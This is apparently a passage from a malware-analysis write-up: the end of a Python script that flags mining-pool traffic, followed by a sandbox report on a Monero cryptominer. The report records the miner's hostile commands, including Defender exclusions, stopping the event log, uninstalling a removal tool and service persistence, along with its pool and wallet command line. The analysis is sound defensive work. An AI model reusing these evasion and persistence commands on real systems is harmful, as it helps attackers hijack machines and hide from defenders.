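    return any(name == s or name.endswith("." + s) for s in POOL_DOMAIN_SUFFIXES)


def correlate(dns_log, flow_lines) -> list[dict]:
    """Score each flow: 'high' when the destination was returned for a pool
    lookup and the port is non-standard, 'medium' for pool IP alone, 'low'
    for a non-standard port alone; flows with neither signal are dropped."""
    pool_ips = {ip: name for name, ip in dns_log if is_pool_domain(name)}
    findings = []
    for line in flow_lines:
        f = parse_flow(line)
        pool = f.dst in pool_ips
        odd_port = f.dport not in COMMON_PORTS
        if not (pool or odd_port):
            continue
        severity = "high" if pool and odd_port else "medium" if pool else "low"
        findings.append({"flow": f, "severity": severity,
                         "pool_domain": pool_ips.get(f.dst)})
    return findings


if __name__ == "__main__":
    for item in correlate(DNS_LOG, FLOW_LOG):
        f = item["flow"]
        print(item["severity"], f"{f.dst}:{f.dport}", item["pool_domain"] or "-")
```

The port-only signal is kept at low severity on purpose: internal services on 8443 or similar are common, and the report's own "non-standard ports" signature is a weak indicator until it is joined with the pool lookup or with the stratum strings found in the miner's memory.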

System Summary

Source: 38.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE; Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 38.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE; Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 38.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE; Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000026.00000002.3365337021.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY; Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: conhost.exe PID: 7064, type: MEMORYSTR; Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Users\user\Desktop\WWhhc3A0rs.exe; Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\conhost.exe; Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\WWhhc3A0rs.exe; Code function: 0_2_00007FF71EB11394 NtAllocateUserPhysicalPages
Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe; Code function: 24_2_00007FF701161394 NtManageHotPatch
Source: C:\Windows\System32\conhost.exe; Code function: 35_2_0000000140001394 NtReleaseWorkerFactoryWorker
Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe; File created: C:\Windows\TEMP\uoqzkgppgdee.sys
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File deleted: C:\Windows\Temp\__PSScriptPolicyTest_eoluthrv.kz2.ps1
Source: C:\Users\user\Desktop\WWhhc3A0rs.exe; Code function: 0_2_00007FF71EB13B50
Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe; Code function: 24_2_00007FF701163B50
Source: C:\Windows\System32\conhost.exe; Code function: 35_2_0000000140003150
Source: C:\Windows\System32\conhost.exe; Code function: 35_2_00000001400026E0
Source: Joe Sandbox View; Dropped File: C:\Windows\Temp\uoqzkgppgdee.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
Source: C:\Users\user\Desktop\WWhhc3A0rs.exe; Code function: String function: 00007FF71EB11394 appears 33 times
Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe; Code function: String function: 00007FF701161394 appears 33 times
Source: WWhhc3A0rs.exe; Static PE information: invalid certificate
Source: 38.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE; Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 38.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 38.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000026.00000002.3365337021.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY; Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: conhost.exe PID: 7064, type: MEMORYSTR; Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: uoqzkgppgdee.sys.24.dr; Binary string: \Device\WinRing0_1_2_0
Source: classification engine; Classification label: mal100.spyw.evad.mine.winEXE@57/12@1/1
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5360:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Mutant created: NULL
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5412:120:WilError_03
Source: C:\Windows\System32\conhost.exe; Mutant created: \BaseNamedObjects\Local\SM0:4208:120:WilError_03
Source: C:\Windows\System32\conhost.exe; Mutant created: \BaseNamedObjects\Local\SM0:2620:120:WilError_03
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5764:120:WilError_03
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6492:120:WilError_03
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3416:120:WilError_03
Source: C:\Windows\System32\conhost.exe; Mutant created: \BaseNamedObjects\Local\SM0:2536:120:WilError_03
Source: C:\Windows\System32\conhost.exe; Mutant created: \BaseNamedObjects\Global\zwmrpsqnvjcqurym
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3520:120:WilError_03
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2724:120:WilError_03
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6216:120:WilError_03
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2620:120:WilError_03
Source: C:\Windows\System32\conhost.exe; Mutant created: \BaseNamedObjects\Local\SM0:5704:120:WilError_03
Source: C:\Windows\System32\conhost.exe; Mutant created: \BaseNamedObjects\Local\SM0:6492:120:WilError_03
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5660:120:WilError_03
Source: C:\Windows\System32\conhost.exe; Mutant created: \BaseNamedObjects\Local\SM0:5712:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5gzr1fdm.dyh.ps1
Source: WWhhc3A0rs.exe; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Users\user\Desktop\WWhhc3A0rs.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: WWhhc3A0rs.exe ReversingLabs: Detection: 57%
Source: C:\Users\user\Desktop\WWhhc3A0rs.exe File read: C:\Users\user\Desktop\WWhhc3A0rs.exe
Source: unknown Process created: C:\Users\user\Desktop\WWhhc3A0rs.exe "C:\Users\user\Desktop\WWhhc3A0rs.exe"
Source: C:\Users\user\Desktop\WWhhc3A0rs.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\WWhhc3A0rs.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\WWhhc3A0rs.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\WWhhc3A0rs.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\WWhhc3A0rs.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\WWhhc3A0rs.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Users\user\Desktop\WWhhc3A0rs.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "VKWMZEFB"
Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\WWhhc3A0rs.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "VKWMZEFB" binpath= "C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe" start= "auto"
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\WWhhc3A0rs.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\Desktop\WWhhc3A0rs.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "VKWMZEFB"
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe
Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe Process created: C:\Windows\System32\conhost.exe conhost.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: C:\Users\user\Desktop\WWhhc3A0rs.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\wusa.exe Section loaded: dpx.dll
Source: C:\Windows\System32\wusa.exe Section loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wusa.exe Section loaded: uxtheme.dll
Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: licensemanagersvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: licensemanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: clipc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: WWhhc3A0rs.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: WWhhc3A0rs.exe Static file information: File size 2729064 > 1048576
Source: WWhhc3A0rs.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x27c800
Source: WWhhc3A0rs.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: lwmyuxxpdkdz.exe, 00000018.00000003.2185438730.000001CDABBB0000.00000004.00000001.00020000.00000000.sdmp, uoqzkgppgdee.sys.24.dr
Source: WWhhc3A0rs.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: WWhhc3A0rs.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: WWhhc3A0rs.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: WWhhc3A0rs.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: WWhhc3A0rs.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: WWhhc3A0rs.exe Static PE information: section name: .00cfg
Source: lwmyuxxpdkdz.exe.0.dr Static PE information: section name: .00cfg
Source: C:\Users\user\Desktop\WWhhc3A0rs.exe Code function: 0_2_00007FF71EB11394 push qword ptr [00007FF71EB1B004h]; ret 0_2_00007FF71EB11403
Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe Code function: 24_2_00007FF701161394 push qword ptr [00007FF70116B004h]; ret 24_2_00007FF701161403
Source: C:\Windows\System32\conhost.exe Code function: 35_2_0000000140001394 push qword ptr [0000000140009004h]; ret 35_2_0000000140001403

              Persistence and Installation Behavior

Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe File created: C:\Windows\TEMP\uoqzkgppgdee.sys
Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe File created: C:\Windows\Temp\uoqzkgppgdee.sys
Source: C:\Users\user\Desktop\WWhhc3A0rs.exe File created: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe
              Source: C:\Users\user\Desktop\WWhhc3A0rs.exeFile created: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeJump to dropped file
              Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exeFile created: C:\Windows\Temp\uoqzkgppgdee.sysJump to dropped file
              Source: C:\Users\user\Desktop\WWhhc3A0rs.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "VKWMZEFB"

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: conhost.exe, 00000026.00000003.2187478798.000001D9F36B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEZWMRPSQNVJCQURYM
              Source: conhost.exe, 00000026.00000002.3375667988.000001D9F372C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000026.00000003.3107995207.000001D9F372E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
              Source: conhost.exe, 00000026.00000002.3375667988.000001D9F372C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000026.00000003.3107995207.000001D9F372E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEBUFFERNDOQ
              Source: conhost.exe, 00000026.00000002.3375667988.000001D9F372C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEEM
              Source: conhost.exe, 00000026.00000002.3375667988.000001D9F3695000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CONHOST.EXE--ALGO=RX/0--URL=XMR-EU1.NANOPOOL.ORG:10343--USER=43BCRC8GIN9UHZJ3BCC7QX9TRYGC6H5TTMUCXLMH2DL87XCVFFSB2AYEKJTSYQWZSMXSW8TN9KVOVSWRFYTRAEPI5MWABGC.RIG7--PASS=--CPU-MAX-THREADS-HINT=60--CINIT-WINRING=UOQZKGPPGDEE.SYS--RANDOMX-NO-RDMSR--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-STEALTH-FULLSCREEN--CINIT-VERSION=3.4.1--TLS--CINIT-IDLE-WAIT=1--CINIT-IDLE-CPU=100--CINIT-ID=ZWMRPSQNVJCQURYM
              Source: conhost.exe, 00000026.00000002.3375667988.000001D9F3695000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
              Source: conhost.exe, 00000026.00000002.3375667988.000001D9F3695000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE.#]
